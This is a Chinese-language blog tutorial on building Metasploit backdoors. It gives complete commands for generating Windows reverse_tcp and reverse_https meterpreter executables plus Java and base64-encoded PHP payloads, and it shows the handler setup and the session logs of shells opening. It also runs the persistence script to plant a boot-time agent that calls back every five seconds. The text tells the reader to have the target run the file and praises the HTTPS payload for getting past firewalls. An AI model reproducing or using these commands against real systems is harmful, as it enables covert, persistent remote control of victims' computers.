Metasploit可执行后门
2021/6/20 22:26:25
本文主要是介绍Metasploit可执行后门,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
目录
msfpayload as shellcode
persistence
他能生成LINUX WINDOWS PHP ASP JSP等等的后门哦
msfpayload as shellcode
查看全部列表 目前有:248 蛋
root@kali:/home/brk# msfpayload -l
他能生成多种多样的
简单的来说一个
正常的Windows后门
:用的是:windows/meterpreter/reverse_tcp
msfpayload windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=8080 R | \ msfencode -b '' -t exe -o /var/www/meterpreter.exe
生成以后让目标运行 我们需要进行监听,或者SHELL
msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 5.5.5.1 LHOST => 5.5.5.1 msf exploit(handler) > set LPORT 8080 LPORT => 8080 msf exploit(handler) > exploit [*] Started reverse handler on 5.5.5.1:8080 [*] Starting the payload handler... [*] Sending stage (752128 bytes) to 5.5.5.3 [*] Meterpreter session 1 opened (5.5.5.1:8080 -> 5.5.5.3:1055) at 2020-03-21 23:26:58 +0800 meterpreter >
其他(php asp jsp dll)
选中你的msfpayload名字,生成,你动的 例如:
Dll:
php:
msf payload(bind_php) > generate -t raw -e php/base64 eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));
JAVA:
./msfpayload java/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=4444 W > /tmp/job.jar
不正常的Windows后门
说到正常的肯定有不正常的 例如:reverse_https reverse_http
大家都晓得 这东西秒杀防火墙的,在生成的过程中,党意外中断的链接我们可以再继续链接,就像灰鸽子一样,默认是5分钟,你可以设置SessionExpirationTimeout选项为0,代表链接永远不会过期。
brk@Dis9Team:~$ sudo msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=5.5.5.1 LPORT=1111 > https.exe brk@Dis9Team:~$ file https.exe https.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
现在我们来运行他。
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https PAYLOAD => windows/meterpreter/reverse_https msf exploit(handler) > set LHOST 5.5.5.1 LHOST => 5.5.5.1 msf exploit(handler) > set LPORT 1111 LPORT => 1111 msf exploit(handler) > set SessionCommunicationTimeout 0 SessionCommunicationTimeout => 0 msf exploit(handler) > set ExitOnSession false ExitOnSession => false msf exploit(handler) > exploit -j [*] Exploit running as background job. [*] Started HTTPS reverse handler on https://5.5.5.1:1111/ msf exploit(handler) > [*] Starting the payload handler... [*] 5.5.5.3:1060 Request received for /AauE... [*] 5.5.5.3:1060 Staging connection for target /AauE received... [*] Patched transport at offset 486516... [*] Patched URL at offset 486248... [*] Patched Expiration Timeout at offset 641856... [*] Patched Communication Timeout at offset 641860... [*] Meterpreter session 2 opened (5.5.5.1:1111 -> 5.5.5.3:1060) at 2020-03-21 23:40:06 +0800
成功了,多点了一下 两个SHELL 我们吧SHELL绘画删除了
msf exploit(handler) > sessions Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 2 meterpreter x86/win32 DIS9TEAM-A1\brk @ DIS9TEAM-A1 5.5.5.1:1111 -> 5.5.5.3:1060 (5.5.5.3) 3 meterpreter x86/win32 DIS9TEAM-A1\brk @ DIS9TEAM-A1 5.5.5.1:1111 -> 5.5.5.3:1118 (5.5.5.3) msf exploit(handler) > sessions -k 2 [*] Killing session 2 [*] Meterpreter session 2 closed. msf exploit(handler) > sessions -k 3 [*] Killing session 3 [*] Meterpreter session 3 closed. msf exploit(handler) > sessions Active sessions =============== No active sessions. msf exploit(handler) >
继续监听:
msf exploit(handler) > exploit -j [*] Exploit running as background job. [*] Started HTTPS reverse handler on https://5.5.5.1:1111/ [*] Starting the payload handler... msf exploit(handler) > [*] 5.5.5.3:1280 Request received for /AauE... [*] 5.5.5.3:1280 Staging connection for target /AauE received... [*] Patched transport at offset 486516... [*] Patched URL at offset 486248... [*] Patched Expiration Timeout at offset 641856... [*] Patched Communication Timeout at offset 641860... [*] Meterpreter session 4 opened (5.5.5.1:1111 -> 5.5.5.3:1280) at 2012-03-21 23:45:57 +0800
继续获得了SHELL
persistence
这货是POST EXPLOITS模块的,前提你要有SHELL绘画,创建持续的后门,作为系统服务器启动
先来链接SHELL,查看帮助先:
msf exploit(handler) > sessions -i 4 meterpreter > run persistence -h Meterpreter Script for creating a persistent backdoor on a target host. OPTIONS: -A Automatically start a matching multi/handler to connect to the agent -L Location in target host where to write payload to, if none %TEMP% will be used. -P Payload to use, default is windows/meterpreter/reverse_tcp. -S Automatically start the agent on boot as a service (with SYSTEM privileges) -T Alternate executable template to use -U Automatically start the agent when the User logs on -X Automatically start the agent when the system boots -h This help menu -i The interval in seconds between each connection attempt -p The port on the remote host where Metasploit is listening -r The IP of the system running Metasploit listening for the connect back meterpreter >
下面我们来运行:
meterpreter > run persistence -A -L c:\\windows\\ -x -i 5 -p 1234 -r 5.5.5.1 [*] Running Persistance Script [*] Resource file for cleanup created at /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=1234 [*] Persistent agent script is 609512 bytes long [+] Persistent Script written to c:\windows\\FBEzRzQYpXKFg.vbs [*] Starting connection handler at port 1234 for windows/meterpreter/reverse_tcp [+] Multi/Handler started! [*] Executing script c:\windows\\FBEzRzQYpXKFg.vbs [+] Agent executed with PID 3280 meterpreter >
安装到了 c:\windows 每隔5秒监听端口1234,本机是5.5.5.1
这篇关于Metasploit可执行后门的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-06-26结对编程到底难不难?答案在这里
- 2024-06-19《2023版Java工程师》课程升级公告
- 2024-06-15matplotlib作图不显示3D图,怎么办?
- 2024-06-1503-Loki 日志监控
- 2024-06-1504-让LLM理解知识 -Prompt
- 2024-06-05做软件测试需要懂代码吗?
- 2024-06-0514-ShardingSphere的分布式主键实现
- 2024-06-03为什么以及如何要进行架构设计权衡?
- 2024-05-31全网首发第二弹!软考2024年5月《软件设计师》真题+解析+答案!(11-20题)
- 2024-05-31全网首发!软考2024年5月《软件设计师》真题+解析+答案!(21-30题)